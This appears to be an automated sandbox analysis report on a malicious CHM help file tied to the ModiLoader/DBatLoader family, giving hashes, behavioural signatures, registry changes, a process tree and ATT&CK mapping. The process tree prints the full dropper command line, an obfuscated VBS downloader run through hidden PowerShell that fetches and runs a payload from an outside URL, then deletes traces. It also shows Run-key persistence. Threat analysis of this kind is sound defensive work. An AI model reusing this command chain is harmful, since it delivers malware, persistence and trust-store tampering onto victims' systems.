Analysis
  max time kernel: 122s
  max time network: 123s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 21/01/2025, 03:01

Static task: static1

Behavioral task: behavioral1
  Sample: 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
  Resource: win7-20240903-en

Behavioral task: behavioral2
  Sample: 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
  Resource: win10v2004-20241007-en
General
  Target: 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
  Size: 75KB
  MD5: 98191ac03cddd697bed63b0eab761bed
  SHA1: 9ea831063cbdccf9de4b79e195800cac9d5518ad
  SHA256: 5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33
  SHA512: 7313ac3423e2e68e42c58a04b6b945b5b0e6ff1c8aea91fb145cca927d19b0be54b2cb174ef6a8434970b41ed539ce295da6b8246844ddbf3b5735a7b77f4a7d
  SSDEEP: 1536:pbN0IxCKVgZpisZ1MJ0cifP4R232WJniFPurASPDuP/V6McEJh:ZGIkgI1gNi44TJiFP8ASS8ML
Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

Modiloader family

ModiLoader Second Stage (61 IoCs)
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
  PID 2268 powershell.exe
  PID 2864 powershell.exe

Executes dropped EXE (5 IoCs)
  PID 2936 ript.exe
  PID 2744 x.exe
  PID 2780 svchost.pif
  PID 3036 svchost.pif
  PID 2740 ezaitqoJ.pif

Loads dropped DLL (6 IoCs)
  PID 2268 powershell.exe (4 entries)
  PID 2744 x.exe (2 entries)

Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str): \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Joqtiaze = "C:\\Users\\Public\\Joqtiaze.url"  (x.exe)

Hide Artifacts: Hidden Window (1 TTPs, 1 IoCs)
Windows that would typically be displayed when an application carries out an operation can be hidden.
  PID 2308 cmd.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 2 IoCs)
  flow 8: drive.google.com
  flow 10: drive.google.com

Suspicious use of SetThreadContext (1 IoCs)
  PID 2744 (x.exe) set thread context of 2740  (procid_target 50)

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (cmd.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (cmd.exe)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  (x.exe)

Kills process with taskkill (1 IoCs)
  PID 2860 taskkill.exe

Modifies Internet Explorer settings (1 IoCs)
  Key created: \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main  (hh.exe)

Modifies system certificate store (2 TTPs, 2 IoCs)
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8  (ript.exe)
  Set value (data): \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob not captured on the page)  (ript.exe)

Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
  HTTP User-Agent header, flow 10: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header, flow 12: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  PID 2744 x.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  PID 2268 powershell.exe
  PID 2864 powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Token: SeDebugPrivilege  PID 2268 powershell.exe
  Token: SeDebugPrivilege  PID 2864 powershell.exe
  Token: SeDebugPrivilege  PID 2860 taskkill.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
  PID 2448 hh.exe (2 entries)

Suspicious use of WriteProcessMemory (42 IoCs)
Processes
(Process tree; each entry gives image path and PID, then the command line, then the signatures triggered by that process. Indentation shows the parent/child relationship.)

C:\Windows\hh.exe  (PID 2448)
  "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe  (PID 2308)
    "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
    - Hide Artifacts: Hidden Window
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\extrac32.exe  (PID 484)
      extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2268)
      powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd"
      - Command and Scripting Interpreter: PowerShell
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Users\Public\ript.exe  (PID 2936)
        "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd
        - Executes dropped EXE
        - Modifies system certificate store

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2864)
      powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 1564)
        cmd /c ""C:\Users\Public\df.cmd" "
        - Suspicious use of WriteProcessMemory

        C:\Windows\system32\extrac32.exe  (PID 2868)
          extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"

        C:\Users\Admin\AppData\Local\Temp\x.exe  (PID 2744)
          "C:\Users\Admin\AppData\Local\Temp\x.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Adds Run key to start application
          - Suspicious use of SetThreadContext
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: CmdExeWriteProcessMemorySpam
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\cmd.exe  (PID 2408)
            cmd /c ""C:\Users\Public\JoqtiazeF.cmd" "
            - System Location Discovery: System Language Discovery

          C:\Windows\SysWOW64\cmd.exe  (PID 2784)
            cmd /c C:\Users\Public\Libraries\FX.cmd
            - System Location Discovery: System Language Discovery

            C:\Windows \SysWOW64\svchost.pif  (PID 2780)
              "C:\Windows \SysWOW64\svchost.pif"
              - Executes dropped EXE

            C:\Windows \SysWOW64\svchost.pif  (PID 3036)
              "C:\Windows \SysWOW64\svchost.pif"
              - Executes dropped EXE

          C:\Users\Public\Libraries\ezaitqoJ.pif  (PID 2740)
            C:\Users\Public\Libraries\ezaitqoJ.pif
            - Executes dropped EXE

    C:\Windows\system32\taskkill.exe  (PID 2860)
      taskkill /F /IM hh.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
Network

MITRE ATT&CK Enterprise v15
  Privilege Escalation
    Boot or Logon Autostart Execution (1)
      Registry Run Keys / Startup Folder (1)
  Defense Evasion
    Hide Artifacts (1)
      Hidden Window (1)
    Modify Registry (3)
    Subvert Trust Controls (1)
      Install Root Certificate (1)
Downloads